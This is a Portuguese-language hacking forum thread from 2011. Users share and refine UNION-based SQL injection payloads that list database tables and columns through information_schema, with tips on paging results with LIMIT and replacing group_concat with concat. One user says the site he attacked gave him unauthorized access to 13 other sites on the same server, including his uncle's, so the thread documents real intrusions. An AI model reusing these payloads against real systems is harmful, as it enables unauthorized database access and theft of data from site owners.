Unconfigured Ad Widget

**Enkhyl** · 18-10-2011, 16:49

Poxa mano ... tbm tenho essa dúvida. Eu tbm uso essa string que vc colokou ai em cima e nao aparece todas as tabelas...

O mesmo acontece qndo quero pegar todas as colunas com o código:

"...php?id= -10 union select 1,2,group_concat(column_name),4,5,6,7,8,9 from+information_schema.columns+where+table_schema =database()--"

...

**chiquin** · 19-10-2011, 08:38

alguem ajuda ae galera , ja tem 2 membros com a mesma duvida, se o havij fez nos tb podemos uai... ou n

**4linux-** · 19-10-2011, 13:22

me passa o site que voce está testando por favor.

**chiquin** · 19-10-2011, 15:20

Postado Originalmente por 4linux- Ver Post

me passa o site que voce está testando por favor.

infelizmente nao poderei fazer isso cara, pq atravez deste site consegui acesso aos outros 13 todos acessados no mesmo servidor LOL, e sao todos da minha cidade e pah, e um é do meu tio kkkk era pedir pra fuder postando aqui

**0KaL** · 19-10-2011, 20:41

Tente assim:

Código:

"../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"

Viu o final, onde adicionei "limit 0,1"? Aquilo serve para limitar o resultado a uma resposta por vez, na página 0 (C-Like, non Pascal-Like, ou seja, a contagem começa no zero).
Assim você vai alterando:

Código:

limit 0,1
limit 1,1
limit 2,1
limit 3,1

E assim por diante, até obter todos os dados. Limite todos os seus requests a 1.
Note que até mesmo o próprio Havij recebe um dado por vez.
Mas com isso você está recebendo as tabelas, e não as colunas.
Recomendo a leitura do meu tutorial para quem está acostumado com o Havij e quer mais informações sobre o SQLi manual (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).

**4linux-** · 19-10-2011, 22:00

perfeito como sempre 0kal. Parabens.

**4linux-** · 19-10-2011, 22:02

Postado Originalmente por 0KaL Ver Post

Tente assim:

Código:

"../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"

Viu o final, onde adicionei "limit 0,1"? Aquilo serve para limitar o resultado a uma resposta por vez, na página 0 (C-Like, non Pascal-Like, ou seja, a contagem começa no zero).
Assim você vai alterando:

Código:

limit 0,1
limit 1,1
limit 2,1
limit 3,1

E assim por diante, até obter todos os dados. Limite todos os seus requests a 1.
Note que até mesmo o próprio Havij recebe um dado por vez.
Mas com isso você está recebendo as tabelas, e não as colunas.
Recomendo a leitura do meu tutorial para quem está acostumado com o Havij e quer mais informações sobre o SQLi manual (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).

nao teria espaco aqui: 0,1(espaco) -- ?
ficando assim: 0,1 --

**0KaL** · 20-10-2011, 14:40

Obrigado

Espaço? Pode ter, mas não é necessário.
É facultativo... Se você acha que com o espaço fica mais organizado, pode usar. Mas sem o espaço, o resultado é o mesmo.

**chiquin** · 20-10-2011, 18:27

Postado Originalmente por 0KaL Ver Post

Tente assim:

Código:

"../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"

Viu o final, onde adicionei "limit 0,1"? Aquilo serve para limitar o resultado a uma resposta por vez, na página 0 (C-Like, non Pascal-Like, ou seja, a contagem começa no zero).
Assim você vai alterando:

Código:

limit 0,1
limit 1,1
limit 2,1
limit 3,1

E assim por diante, até obter todos os dados. Limite todos os seus requests a 1.
Note que até mesmo o próprio Havij recebe um dado por vez.
Mas com isso você está recebendo as tabelas, e não as colunas.
Recomendo a leitura do meu tutorial para quem está acostumado com o Havij e quer mais informações sobre o SQLi manual (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).

muito obrigado cara, ajudou bastante, porem nao deu certo com "group_concat", eu deletei o "group_" e deixei so o concat e foi

**4linux-** · 20-10-2011, 21:44

Postado Originalmente por 0KaL Ver Post

Obrigado

Espaço? Pode ter, mas não é necessário.
É facultativo... Se você acha que com o espaço fica mais organizado, pode usar. Mas sem o espaço, o resultado é o mesmo.

ata, valeu, pensei que modificava algo.

**0KaL** · 22-10-2011, 19:55

Só me esqueci de uma coisa:
O group_concat às vezes trava, quando a quantidade de tabelas é grande, por isso, eu (e até mesmo o Havij) evito usar.
Mas no exemplo acima, o problema pode também estar na falta do limit.

Código:

"../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"

Sim!, até mesmo com group_concat, você precisa usar o limit.
Mas é como eu disse, é bom evitar. Se não der, parte para o concat() um a um mesmo.

**n4sss** · 23-10-2011, 16:53

ja tentou:

-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(c olumn_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns

Unconfigured Ad Widget

Anúncio

Poder ver todas as colunas da tabela...

Poder ver todas as colunas da tabela...

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment